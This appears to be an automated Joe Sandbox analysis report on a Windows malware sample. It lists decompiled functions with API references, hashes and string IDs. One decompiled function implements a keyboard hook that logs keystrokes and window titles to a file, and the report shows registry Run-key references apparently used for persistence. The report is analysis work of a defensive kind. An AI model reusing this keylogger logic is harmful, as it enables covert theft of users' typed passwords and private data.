                                      				E0025E221( &(__ecx[0x76]));
                                      				E00252E66( &(__ecx[0xc]));
                                      				E00252E66( &(__ecx[4]));
                                      				_t12 =  *__ecx;
                                      				_t7 = VirtualFree(_t12, 0, 0x8000); // executed
                                      				return _t7;
			}

                                      APIs
                                      • WSACleanup.WS2_32 ref: 00255110
                                        • Part of subcall function 0025E221: ReleaseMutex.KERNEL32(?,?,0025DE9B,?,00255774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0025E226
                                        • Part of subcall function 0025E221: CloseHandle.KERNEL32(?), ref: 0025E22E
                                      Yara matches
                                      Similarity
                                      • API ID: CleanupCloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 708017517-0
                                      • Opcode ID: ec3f3db3678bfe487c4c77c5cdb1ba08b8eefcc3d2f6e6004d496aa461777bd5
                                      • Instruction ID: 674bca53c2b1a096dbd09302dfacdae84acd6c96ceff825951fe770230bd7b3f
                                      • Opcode Fuzzy Hash: ec3f3db3678bfe487c4c77c5cdb1ba08b8eefcc3d2f6e6004d496aa461777bd5
                                      • Instruction Fuzzy Hash: F7D09E31030611CBC328EB20E8668D9B364BF15701750092D9883525929F74BA1DCB44
                                      Uniqueness

                                      Uniqueness Score: 1.47%

                                      C-Code - Quality: 50%
                                      			E0025DBF3(void* __ecx) {
                                      				char _v8;
                                      				signed int _t4;
                                      
                                      				_push(__ecx);
                                      				_v8 = GetCurrentProcess();
                                      				_t4 = E0025EBD4( &_v8); // executed
                                      				asm("sbb eax, eax");
                                      				return  ~( ~_t4);
			}

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                        • Part of subcall function 0025EBD4: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBE9
                                        • Part of subcall function 0025EBD4: GetProcAddress.KERNEL32(00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EBF0
                                        • Part of subcall function 0025EBD4: IsWow64Process.KERNEL32(?,00000000,?,0025DC08,?,?,00252BBD,?,00262608,?,?,00000000,?), ref: 0025EC00
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID:
                                      • API String ID: 1745181078-0
                                      • Opcode ID: d50689651cd29f6aefb24ce2fc75f34eb17b0e308d80894e986dd5cf48f7f957
                                      • Instruction ID: cbcc311c9a79e6e354d5dde439079dd9800875e3419a57a1ef96f5bdb11f4213
                                      • Opcode Fuzzy Hash: d50689651cd29f6aefb24ce2fc75f34eb17b0e308d80894e986dd5cf48f7f957
                                      • Instruction Fuzzy Hash: E9C08C3086030EEBCF04ABB4D90985D77A8AB102497004664E403D3190EE70EB0C8A81
                                      Uniqueness

                                      Uniqueness Score: 0.43%

                                      C-Code - Quality: 100%
                                      			E0025EF4C(void** __ecx) {
                                      				long _t1;
                                      				signed int* _t3;
                                      
                                      				_t3 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t1 = RegCloseKey( *__ecx); // executed
                                      				}
                                      				 *_t3 =  *_t3 & 0x00000000;
                                      				return _t1;
			}

                                      APIs
                                      • RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 9c08ce64840cda9a263c06dd3486a9b478d0dc7a7ea8931613eda593a98dab5c
                                      • Instruction ID: b1c03d5bf9efcbf0f84d18c77c461ad9f9a6c9844882edf11a6a423106012645
                                      • Opcode Fuzzy Hash: 9c08ce64840cda9a263c06dd3486a9b478d0dc7a7ea8931613eda593a98dab5c
                                      • Instruction Fuzzy Hash: B3C04C31425221CBD7361F14F4187917BE5AB14312F25045ED4C155064D7B50CD4CA44
                                      Uniqueness

                                      Uniqueness Score: 0.09%

                                      APIs
                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0025D715
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: fb3f43e4886ea04a7b1e38da45b18e00e01b36edd8e296549fb9fe516a6c0ff7
                                      • Instruction ID: 065d5dad34263c6b25590eecdd9ef948e5b9bb249467c320ab9f6b85767a03df
                                      • Opcode Fuzzy Hash: fb3f43e4886ea04a7b1e38da45b18e00e01b36edd8e296549fb9fe516a6c0ff7
                                      • Instruction Fuzzy Hash: ACB012303F424097DB001B709C1AF1437149742B07F204260F112D80F4C6D100455501
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
                                      			E002559AA(long __ecx) {
                                      				void* _t1;
                                      				long _t7;
                                      				void* _t8;
                                      
                                      				_t7 = __ecx;
                                      				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                      				_t8 = _t1;
                                      				E00255AB9(_t8, _t7);
                                      				return _t8;
                                      			}
                                      0x002559b3
                                      0x002559b8
                                      0x002559be
                                      0x002559c3
                                      0x002559cd

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0025320F,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002559B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 25c797ea9806d4b528bd4d13e1f4d93ae01c7a38ee552be68994157771e34b01
                                      • Instruction ID: d57f098279015534646acbad3bb243fe28fb73f4959a394ea95fbd71d76ff9df
                                      • Opcode Fuzzy Hash: 25c797ea9806d4b528bd4d13e1f4d93ae01c7a38ee552be68994157771e34b01
                                      • Instruction Fuzzy Hash: 6BC012223496206BE124215A7C2EF5B895CCBC2F71F01005AFB048A2D0D8D00C4241E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E00258C74(void* __eax, void* __ecx) {
                                      				int _t3;
                                      				void* _t5;
                                      
                                      				_t5 =  *(__ecx + 0x10);
                                      				if(_t5 != 0) {
                                      					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
                                      					return _t3;
                                      				} else {
                                      					return __eax;
                                      				}
                                      			}
                                      0x00258c74
                                      0x00258c79
                                      0x00255a35
                                      0x00255a3b
                                      0x00258c7f
                                      0x00258c7f
                                      0x00258c7f

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: c9404b634c280b3dbf2381a95fe30b48c98943eeb9ef8ab870eb55e0cc6a9b17
                                      • Instruction ID: c66c709d9b901c57841b9c66449b68465d2121d55b41834291398c914ac7eb30
                                      • Opcode Fuzzy Hash: c9404b634c280b3dbf2381a95fe30b48c98943eeb9ef8ab870eb55e0cc6a9b17
                                      • Instruction Fuzzy Hash: A2B09B7035074157DE2CCF205C69F1522107740705F70454CA511D90D15565E4058504
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      C-Code - Quality: 100%
                                      			E00255A3C(long __ecx) {
                                      				void* _t1;
                                      
                                      				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                      				return _t1;
                                      			}
                                      0x00255a46
                                      0x00255a4c

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0025347F,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00255A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a60e09aeaf910d2e88fb1ac26c6d982ad4b5dde57a49450879905dbf5fe6a6f
                                      • Instruction ID: 7e547166ff80f24d8fadf0c5ca9b4f2a70c7ae753d9fa788d9329663f96dc8aa
                                      • Opcode Fuzzy Hash: 6a60e09aeaf910d2e88fb1ac26c6d982ad4b5dde57a49450879905dbf5fe6a6f
                                      • Instruction Fuzzy Hash: 93A022B03C8300FBFC280300AC0FF002A08C300F03F000080F308AC0C000E020808028
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E00255A2D(void* __ecx) {
                                      				int _t1;
                                      
                                      				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
                                      				return _t1;
                                      			}
                                      0x00255a35
                                      0x00255a3b

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 21f7f2b811b8dc76bef2ae3b9c505f5714ae1b9c1ee0f93bbc697b93033456df
                                      • Instruction ID: 516737b1dc6ca1d1de3c5f0ee6e520429f13461aa5dd5485fe0ee397820626de
                                      • Opcode Fuzzy Hash: 21f7f2b811b8dc76bef2ae3b9c505f5714ae1b9c1ee0f93bbc697b93033456df
                                      • Instruction Fuzzy Hash: ABA00270690B40A6EE7457206D1EF0626146740B41F208644B651A80E449E5A0488A19
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 0-2865011727
                                      • Opcode ID: 8fc9f1ba50400aeab3112237d1631edb29064a8828ebbc40ef117a6b1379b47d
                                      • Instruction ID: 072a5315efd72b6cc95a4aca5a8ae70f09bae975913f9bc3561aadbb3c5cc04a
                                      • Opcode Fuzzy Hash: 8fc9f1ba50400aeab3112237d1631edb29064a8828ebbc40ef117a6b1379b47d
                                      • Instruction Fuzzy Hash: 90E184F7A403017AF32A72296C63F7B36ADC396B4CF984508F524697C7F5A6E5104368
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025765A(signed int __ecx, int __edx, long _a4) {
                                      				signed int _v8;
                                      				int _v12;
                                      				short _v24;
                                      				short _v56;
                                      				void* _t21;
                                      				short _t24;
                                      				short _t27;
                                      				void* _t36;
                                      				int _t46;
                                      				signed int _t48;
                                      				WCHAR* _t49;
                                      				WCHAR* _t50;
                                      				long _t57;
                                      				void* _t58;
                                      				short _t59;
                                      				short _t60;
                                      				short _t62;
                                      				short _t63;
                                      				short _t64;
                                      				short _t66;
                                      				short _t67;
                                      				short _t69;
                                      				short _t70;
                                      				short _t71;
                                      				short _t73;
                                      				short _t75;
                                      				short _t77;
                                      				short _t78;
                                      				short _t79;
                                      				signed int _t81;
                                      
                                      				_t55 = __edx;
                                      				_t48 = __ecx;
                                      				_t46 = __ecx;
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				_t57 = _a4;
                                      				_t21 = __edx - 0x100;
                                      				if(_t21 == 0 || _t21 == 4) {
                                      					_t58 =  *_t57;
                                      					if(_t58 < 0x27) {
                                      						__eflags = _t58 - 0x40;
                                      						if(_t58 <= 0x40) {
                                      							L21:
                                      							__eflags = _t58 - 0x66;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0xbc;
                                      								if(__eflags > 0) {
                                      									__eflags = _t58 - 0xdb;
                                      									if(__eflags > 0) {
                                      										_t59 = _t58 - 0xdc;
                                      										__eflags = _t59;
                                      										if(_t59 == 0) {
                                      											_t24 = GetAsyncKeyState(0x10);
                                      											_t49 = "|";
                                      											__eflags = _t24;
                                      											if(__eflags == 0) {
                                      												_t49 = "\\";
                                      											}
                                      											L99:
                                      											E00257AEB(_t49, _t55, _t90);
                                      											goto L100;
                                      										}
                                      										_t60 = _t59 - 1;
                                      										__eflags = _t60;
                                      										if(_t60 == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "}";
                                      											_t55 = "]";
                                      											L76:
                                      											__eflags = _t27;
                                      											_t49 =  ==  ? _t55 : _t50;
                                      											goto L99;
                                      										}
                                      										__eflags = _t60 - 1;
                                      										if(__eflags == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "\"";
                                      											_t55 = "\'";
                                      											goto L76;
                                      										}
                                      										L94:
                                      										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                      										_t49 =  &_v56;
                                      										goto L99;
                                      									}
                                      									if(__eflags == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "{";
                                      										_t55 = "[";
                                      										goto L76;
                                      									}
                                      									_t62 = _t58 - 0xbd;
                                      									__eflags = _t62;
                                      									if(_t62 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "_";
                                      										_t55 = "-";
                                      										goto L76;
                                      									}
                                      									_t63 = _t62 - 1;
                                      									__eflags = _t63;
                                      									if(_t63 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ">";
                                      										_t55 = ".";
                                      										goto L76;
                                      									}
                                      									_t64 = _t63 - 1;
                                      									__eflags = _t64;
                                      									if(_t64 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "?";
                                      										_t55 = "/";
                                      										goto L76;
                                      									}
                                      									__eflags = _t64 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "~";
                                      									_t55 = "`";
                                      									goto L76;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "<";
                                      									_t55 = ",";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa3;
                                      								if(_t58 > 0xa3) {
                                      									__eflags = _t58 - 0xa5;
                                      									if(__eflags <= 0) {
                                      										L78:
                                      										_t49 = L"[ALT]";
                                      										goto L99;
                                      									}
                                      									__eflags = _t58 - 0xba;
                                      									if(_t58 == 0xba) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ":";
                                      										_t55 = ";";
                                      										goto L76;
                                      									}
                                      									__eflags = _t58 - 0xbb;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "+";
                                      									_t55 = "=";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa2;
                                      								if(__eflags >= 0) {
                                      									L71:
                                      									_t49 = L"[CTRL]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x67;
                                      								if(__eflags == 0) {
                                      									_t49 = "7";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x68;
                                      								if(__eflags == 0) {
                                      									_t49 = "8";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x69;
                                      								if(__eflags == 0) {
                                      									_t49 = "9";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0xa0 - 1;
                                      								if(__eflags > 0) {
                                      									goto L94;
                                      								}
                                      								goto L100;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = "6";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x20;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0x62;
                                      								if(__eflags > 0) {
                                      									_t66 = _t58 - 0x63;
                                      									__eflags = _t66;
                                      									if(__eflags == 0) {
                                      										_t49 = "3";
                                      										goto L99;
                                      									}
                                      									_t67 = _t66 - 1;
                                      									__eflags = _t67;
                                      									if(__eflags == 0) {
                                      										_t49 = "4";
                                      										goto L99;
                                      									}
                                      									__eflags = _t67 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t49 = "5";
                                      									goto L99;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t49 = "2";
                                      									goto L99;
                                      								}
                                      								_t69 = _t58 - 0x2d;
                                      								__eflags = _t69;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[INSERT]";
                                      									goto L99;
                                      								}
                                      								_t70 = _t69 - 1;
                                      								__eflags = _t70;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[DEL]";
                                      									goto L99;
                                      								}
                                      								_t71 = _t70 - 0x32;
                                      								__eflags = _t71;
                                      								if(__eflags == 0) {
                                      									_t49 = "0";
                                      									goto L99;
                                      								}
                                      								__eflags = _t71 - 1;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = "1";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = " ";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x11;
                                      							if(__eflags > 0) {
                                      								_t73 = _t58 - 0x12;
                                      								__eflags = _t73;
                                      								if(__eflags == 0) {
                                      									goto L78;
                                      								}
                                      								_t75 = _t73;
                                      								__eflags = _t75;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[CAPS]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t75 - 7;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = L"[ESC]";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								goto L71;
                                      							}
                                      							_t77 = _t58 - 8;
                                      							__eflags = _t77;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[BKSP]";
                                      								goto L99;
                                      							}
                                      							_t78 = _t77 - 1;
                                      							__eflags = _t78;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[TAB]";
                                      								goto L99;
                                      							}
                                      							_t79 = _t78 - 4;
                                      							__eflags = _t79;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[ENTER]\r\n";
                                      								goto L99;
                                      							}
                                      							__eflags = _t79 - 3;
                                      							if(__eflags == 0) {
                                      								goto L100;
                                      							}
                                      							goto L94;
                                      						}
                                      						L19:
                                      						__eflags = _t58 - 0x5b;
                                      						if(_t58 >= 0x5b) {
                                      							goto L21;
                                      						}
                                      						_t36 = E00257AE0();
                                      						__eflags = GetAsyncKeyState(0x10);
                                      						__eflags = E00257ACE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                      						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                      						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                      						E00257AEB( &_v24, _t36, __eflags);
                                      						_t46 = _v8;
                                      						goto L100;
                                      					}
                                      					if(_t58 > 0x40) {
                                      						goto L19;
                                      					}
                                      					if(GetAsyncKeyState(0x10) == 0) {
                                      						wsprintfW( &_v24, L"%c", _t58);
                                      						_t49 =  &_v24;
                                      						goto L99;
                                      					}
                                      					_t81 = _t58 + 0xffffffd0;
                                      					_t90 = _t81 - 9;
                                      					if(_t81 > 9) {
                                      						goto L100;
                                      					}
                                      					switch( *((intOrPtr*)(_t81 * 4 +  &M00257AA6))) {
                                      						case 0:
                                      							_t49 = ")";
                                      							goto L99;
                                      						case 1:
                                      							__ecx = "!";
                                      							goto L99;
                                      						case 2:
                                      							__ecx = "@";
                                      							goto L99;
                                      						case 3:
                                      							__ecx = "#";
                                      							goto L99;
                                      						case 4:
                                      							__ecx = "$";
                                      							goto L99;
                                      						case 5:
                                      							__ecx = "%";
                                      							goto L99;
                                      						case 6:
                                      							__ecx = "^";
                                      							goto L99;
                                      						case 7:
                                      							__ecx = "&";
                                      							goto L99;
                                      						case 8:
                                      							__ecx = "*";
                                      							goto L99;
                                      						case 9:
                                      							__ecx = "(";
                                      							goto L99;
                                      					}
                                      				} else {
                                      					L100:
                                      					return CallNextHookEx(0, _t46, _v12, _t57);
                                      				}
                                      			}

                                      APIs
                                      • GetAsyncKeyState.USER32(00000010), ref: 00257696
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00257A97
                                        • Part of subcall function 00257AEB: GetForegroundWindow.USER32 ref: 00257B14
                                        • Part of subcall function 00257AEB: GetWindowTextW.USER32(00000000,?,00000104), ref: 00257B27
                                        • Part of subcall function 00257AEB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00257B90
                                        • Part of subcall function 00257AEB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00257BFE
                                        • Part of subcall function 00257AEB: lstrlenW.KERNEL32(002629A0,00000008,00000000,?,?), ref: 00257C27
                                        • Part of subcall function 00257AEB: WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                      • String ID: D&&$[ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]$|*&$*&$*&$*&$*&
                                      • API String ID: 2452648998-2404510253
                                      • Opcode ID: 7e59b415d706b2f4cd2295f4956b71f0c4c74eae53b4cdf9fc10f6b9e3570e52
                                      • Instruction ID: 90192df7ebc470501d8a6cbf3057084105176d0854f714fd35e7e9f42c59e8eb
                                      • Opcode Fuzzy Hash: 7e59b415d706b2f4cd2295f4956b71f0c4c74eae53b4cdf9fc10f6b9e3570e52
                                      • Instruction Fuzzy Hash: A291EF32AFC912D7D7280AA8756C67D7516A780353F208136DE43676D0C9F04EBEA3DA
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
• Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
• Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2o>H$2o>H$2o>H$2o>H$2o>H$B|_5$B|_5$B|_5$B|_5$B|_5$B|_5$Ku~$Ku~$Ku~$Ku~$Ku~$Ku~$Y$_6+*$ffUb$ffUb$i}J$i}J$i}J$qjf$qjf$qjf$qzv$vyvl$vyvl$vyvl$vyvl$wA,$wA,$wA,$x)1$x)1$x)1$x)1$x)1
                                      • API String ID: 0-3393124289
                                      • Opcode ID: d942da2efe8932096f60084ecff29c836ae3a1650202d28c10e4504cf7558ce6
                                      • Instruction ID: 84f5e911dd0e6ee595baa0c866e15f76bef1c4170aaeea2d85e088c8a4b2bd37
                                      • Opcode Fuzzy Hash: d942da2efe8932096f60084ecff29c836ae3a1650202d28c10e4504cf7558ce6
                                      • Instruction Fuzzy Hash: 1753EFB48057A98BEB34CF59C9987DDBBB1BB41328F1083D9D1682B291C7B61AC5CF41
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 85%
                                      			E00257CB3(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				char _v524;
                                      				short _v564;
                                      				intOrPtr _v568;
                                      				short _v570;
                                      				short _v572;
                                      				long _v596;
                                      				char _v600;
                                      				int _v604;
                                      				char _v612;
                                      				intOrPtr _v616;
                                      				struct _OVERLAPPED* _v620;
                                      				char _v624;
                                      				char _v628;
                                      				void* _v632;
                                      				char _v636;
                                      				intOrPtr _v640;
                                      				struct _OVERLAPPED* _v644;
                                      				char _v648;
                                      				void* _t76;
                                      				short _t77;
                                      				void* _t82;
                                      				char* _t84;
                                      				struct _OVERLAPPED** _t86;
                                      				long _t88;
                                      				intOrPtr _t93;
                                      				intOrPtr* _t96;
                                      				long _t100;
                                      				intOrPtr _t101;
                                      				WCHAR* _t102;
                                      				intOrPtr _t104;
                                      				void* _t105;
                                      				long _t109;
